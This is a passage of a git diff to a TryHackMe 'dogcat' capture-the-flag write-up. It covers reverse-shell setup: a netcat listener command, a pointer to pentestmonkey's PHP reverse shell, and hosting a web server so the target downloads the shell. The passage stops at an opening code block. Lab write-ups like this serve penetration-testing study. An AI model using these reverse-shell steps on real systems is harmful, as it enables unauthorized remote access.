McPapa7/pages/tryhackme-writeups/thm-dogcat.md

 ### 2.3 Create a Reverse Shell

-**!!INSERT LINK TO SHELLS TO TRY!!**

-Set up listener on machine:
+Set up listener on our machine for the shell to establish a connection with:

 ```bash
 nc -nvlp 4444
 ```
+**Create shell code**

-I inserted the well known **PHP shell** from pentestmonkey which can be found at: [https://github.com/pentestmonkey/php-reverse-shell](https://github.com/pentestmonkey/php-reverse-shell) making sure to change the ip and port number to match my workstation IP and the port number to that in the netcat listener I set up.
+I used the well known **PHP shell** from pentestmonkey which can be found at: [https://github.com/pentestmonkey/php-reverse-shell](https://github.com/pentestmonkey/php-reverse-shell) making sure to change the ip and port number to match my workstation IP and the port number to that in the netcat listener I set up.

 ![](../.gitbook/assets/monkeySHell.PNG)

+**Get the shell onto the target**
 Host a python web server for target to download our reverse shell from.
 Ensure this is either in the same folder as the reverse shell or adjust the curl command ahead in order to reach the correct directory.

 ```bash